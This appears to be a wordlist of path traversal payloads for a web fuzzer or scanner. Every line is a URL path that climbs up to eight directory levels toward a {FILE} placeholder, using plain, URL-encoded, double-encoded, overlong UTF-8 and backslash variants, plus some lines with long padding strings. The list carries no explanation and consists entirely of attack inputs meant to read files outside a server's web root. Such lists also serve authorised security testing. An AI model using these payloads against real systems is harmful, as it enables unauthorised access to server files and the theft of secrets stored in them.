/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/\../{FILE}
|
||||
/\../\../{FILE}
|
||||
/\../\../\../{FILE}
|
||||
/\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../\../{FILE}
|
||||
//..\{FILE}
|
||||
//..\/..\{FILE}
|
||||
//..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
|
||||
